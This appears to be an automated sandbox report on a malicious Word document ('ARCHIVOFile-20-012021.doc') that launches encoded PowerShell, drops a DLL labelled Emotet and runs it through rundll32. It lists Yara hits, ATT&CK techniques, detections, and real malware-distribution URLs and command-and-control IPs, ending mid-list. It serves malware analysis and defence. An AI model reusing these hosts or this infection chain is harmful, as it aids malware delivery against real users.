                      Source: Yara match File source: 9.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 16.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 11.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 16.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 9.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 13.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.710000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.710000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 11 | Path Interception | Process Injection 111 | Disable or Modify Tools 111 | OS Credential Dumping | File and Directory Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 4 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting 22 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information 3 | LSASS Memory | System Information Discovery 15 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution 3 | Logon Script (Windows) | Logon Script (Windows) | Scripting 22 | Security Account Manager | Query Registry 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Command and Scripting Interpreter 211 | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Security Software Discovery 11 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | PowerShell 3 | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Virtualization/Sandbox Evasion 2 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 14 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 21 | Cached Domain Credentials | Process Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 2 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 111 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Rundll32 1 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

Behavior Graph

Behavior Graph ID: 344894, Sample: ARCHIVOFile-20-012021.doc, Startdate: 27/01/2021, Architecture: WINDOWS, Score: 100

The graph is an image; its node and edge text is reproduced here as a process tree (numbers in parentheses are the graph's node ids, other numbers after a process name are kept as shown in the graph):

start (2): 1.226.84.243:8080 unknown, 104.131.41.185:8080 unknown, 90 other IPs or domains
    signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 17 other signatures
    -> WINWORD.EXE (18) 293 28
    -> cmd.exe (15)
        signatures: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found
        -> powershell.exe (20) 16 13
            network: mrveggy.com 177.12.170.95, 443, 49167 IPV6InternetLtdaBR Brazil; riandutra.com 191.6.196.95, 49165, 80 IPV6InternetLtdaBR Brazil; 4 other IPs or domains
            dropped: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll, PE32
            signatures: Powershell drops PE file
            -> rundll32.exe (27)
                -> rundll32.exe (33)
                    -> rundll32.exe (35) 2
                        signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
                        -> rundll32.exe (38)
                            -> rundll32.exe (40) 1
                                signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
                                -> rundll32.exe (43)
                                    -> rundll32.exe (45) 1
                                        signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
                                        -> rundll32.exe (48)
        -> msg.exe (25)
            -> rundll32.exe (29)
                network: 84.232.229.24, 49175, 80 RCS-RDS73-75DrStaicoviciRO Romania; 51.255.203.164, 8080 OVHFR France
                signatures: System process connects to network (likely due to code injection or exploit)

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
ARCHIVOFile-20-012021.doc | 48% | Virustotal | 
ARCHIVOFile-20-012021.doc | 50% | ReversingLabs | Document-Office.Trojan.GenScript

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll | 100% | Joe Sandbox ML | 
C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll | 46% | Metadefender | 
C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll | 86% | ReversingLabs | Win32.Trojan.EmotetCrypt

                      Unpacked PE Files

Source | Detection | Scanner | Label
16.2.rundll32.exe.1d0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
13.2.rundll32.exe.200000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
8.2.rundll32.exe.10000000.3.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.10000000.2.unpack | 100% | Avira | HEUR/AGEN.1110387
13.2.rundll32.exe.10000000.2.unpack | 100% | Avira | HEUR/AGEN.1110387
16.2.rundll32.exe.1b0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
11.2.rundll32.exe.2c0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
17.2.rundll32.exe.240000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
10.2.rundll32.exe.710000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
10.2.rundll32.exe.6a0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
18.2.rundll32.exe.10000000.2.unpack | 100% | Avira | HEUR/AGEN.1110387
10.2.rundll32.exe.10000000.3.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.270000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
11.2.rundll32.exe.10000000.2.unpack | 100% | Avira | HEUR/AGEN.1110387
18.2.rundll32.exe.290000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
12.2.rundll32.exe.220000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
9.2.rundll32.exe.260000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
14.2.rundll32.exe.10000000.3.unpack | 100% | Avira | HEUR/AGEN.1110387
17.2.rundll32.exe.220000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
12.2.rundll32.exe.10000000.3.unpack | 100% | Avira | HEUR/AGEN.1110387
14.2.rundll32.exe.200000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
16.2.rundll32.exe.10000000.3.unpack | 100% | Avira | HEUR/AGEN.1110387
8.2.rundll32.exe.1f0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
12.2.rundll32.exe.200000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
17.2.rundll32.exe.10000000.2.unpack | 100% | Avira | HEUR/AGEN.1110387
15.2.rundll32.exe.200000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
9.2.rundll32.exe.10000000.2.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.290000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
14.2.rundll32.exe.1e0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
15.2.rundll32.exe.10000000.2.unpack | 100% | Avira | HEUR/AGEN.1110387

                      Domains

Source | Detection | Scanner | Label
hbprivileged.com | 7% | Virustotal | 
mrveggy.com | 5% | Virustotal | 

                      URLs

Source | Detection | Scanner | Label
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe (listed 3 times)
https://norailya.com/drupal/retAl/ | 100% | Avira URL Cloud | malware
http://ocsp.entrust.net03 | 0% | URL Reputation | safe (listed 3 times)
http://crl.use | 0% | Avira URL Cloud | safe
https://ummahstars.com | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe (listed 3 times)
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe (listed 3 times)
https://hbprivileged.comh | 0% | Avira URL Cloud | safe
https://hbprivileged.com | 0% | Avira URL Cloud | safe
https://norailya.com | 0% | Avira URL Cloud | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe (listed 3 times)
https://mrveggy.com/wp-admin/n/ | 0% | Avira URL Cloud | safe
https://sectigo.com/CPS0D | 0% | URL Reputation | safe (listed 3 times)
http://r3.o.lencr.org0 | 0% | URL Reputation | safe (listed 3 times)
http://www.%s.comPA | 0% | URL Reputation | safe (listed 3 times)
https://www.teelekded.com/cgi-bin/LPo/ | 100% | Avira URL Cloud | malware
http://ocsp.entrust.net0D | 0% | URL Reputation | safe (listed 3 times)
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
http://cps.root-x1.letsencrypt.org0 | 0% | URL Reputation | safe (listed 3 times)
http://r3.i.lencr.org/0% | 0% | Avira URL Cloud | safe
http://riandutra.com/email/AfhE8z0/ | 0% | Avira URL Cloud | safe
http://calledtochange.org/CalledtoChange/8huSOd/ | 100% | Avira URL Cloud | malware
https://ummahstars.com/app_old_may_2018/assets/wDL8x/ | 100% | Avira URL Cloud | malware
http://cps.letsencrypt.org0 | 0% | URL Reputation | safe (listed 3 times)
http://riandutra.com | 0% | Avira URL Cloud | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe (listed 3 times)
https://mrveggy.com | 0% | Avira URL Cloud | safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe (listed 3 times)
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe (listed 3 times)
https://hbprivileged.com/cgi-bin/Qg/ | 100% | Avira URL Cloud | malware
http://r3.o.lencr.o | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe (listed 3 times)
https://www.teelekded.com/cgi-bin/LPo/P | 100% | Avira URL Cloud | malware
http://calledtochange.org | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
hbprivileged.com | 35.209.96.32 | true | true | | unknown
mrveggy.com | 177.12.170.95 | true | true | | unknown
ummahstars.com | 35.163.191.195 | true | true | | unknown
riandutra.com | 191.6.196.95 | true | true | | unknown
calledtochange.org | 75.103.81.81 | true | true | | unknown
norailya.com | 104.168.154.203 | true | true | | unknown

                              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://riandutra.com/email/AfhE8z0/ | true | Avira URL Cloud: safe | unknown
http://calledtochange.org/CalledtoChange/8huSOd/ | true | Avira URL Cloud: malware | unknown

                              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.msnbc.com/news/ticker.txt | powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmp | false | | high
http://ocsp.sectigo.com0 | powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
https://norailya.com/drupal/retAl/ | powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://ocsp.entrust.net03 | powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://certificates.godaddy.com/repository/0 | powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmp | false | | high
http://crl.use | powershell.exe, 00000005.00000003.2092182578.000000001D0FC000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://ummahstars.com | powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 00000005.00000003.2101978050.000000001B631000.00000004.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://www.litespeedtech.com | powershell.exe, 00000005.00000002.2111132973.0000000003B72000.00000004.00000001.sdmp | false | | high
https://hbprivileged.comh | powershell.exe, 00000005.00000002.2111189798.0000000003C06000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://hbprivileged.com | powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://norailya.com | powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2111132973.0000000003B72000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://www.icra.org/vocabulary/. | powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
https://mrveggy.com/wp-admin/n/ | powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://investor.msn.com/ | powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmp | false | | high
https://sectigo.com/CPS0D | powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://r3.o.lencr.org0 | powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://www.%s.comPA | powershell.exe, 00000005.00000002.2107547753.0000000002330000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2125133029.0000000002820000.00000002.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | low
https://www.teelekded.com/cgi-bin/LPo/ | powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://certificates.godaddy.com/repository/gdig2.crt0 | powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmp | false | | high
http://ocsp.entrust.net0D | powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://servername/isapibackend.dll | powershell.exe, 00000005.00000002.2112621761.000000001D2F0000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
http://cps.root-x1.letsencrypt.org0 | powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmp | false | URL Reputation: safe (listed 3 times) | unknown
http://r3.i.lencr.org/0% | powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | 
                                        unknown
                                        http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpfalse
                                          high
                                          http://investor.msn.compowershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpfalse
                                            high
                                            http://crl.entrust.net/server1.crl0powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpfalse
                                              high
                                              https://ummahstars.com/app_old_may_2018/assets/wDL8x/powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://cps.letsencrypt.org0powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://riandutra.compowershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmptrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://certs.godaddy.com/repository/1301powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                                high
                                                https://certs.godaddy.com/repository/0powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.hotmail.com/oepowershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpfalse
                                                    high
                                                    https://mrveggy.compowershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkpowershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://crl.godaddy.com/gdroot-g2.crl0Fpowershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000005.00000003.2101978050.000000001B631000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://hbprivileged.com/cgi-bin/Qg/powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://r3.o.lencr.opowershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2107547753.0000000002330000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2102349882.0000000000224000.00000004.00000020.sdmpfalse
                                                            high
                                                            http://crl.godaddy.com/gdig2s1-1814.crl0powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.teelekded.com/cgi-bin/LPo/Ppowershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmptrue
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              http://crl.godaddy.com/gdroot.crl0Fpowershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.2102349882.0000000000224000.00000004.00000020.sdmpfalse
                                                                  high
                                                                  https://secure.comodo.com/CPS0powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://calledtochange.orgpowershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmptrue
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://crl.entrust.net/2048ca.crl0powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpfalse
                                                                      high

                                                                      Contacted IPs


                                                                      Public

                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      109.101.137.162:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      122.201.23.45:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      85.214.26.7:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      188.225.32.231:7080
                                                                      unknownunknown
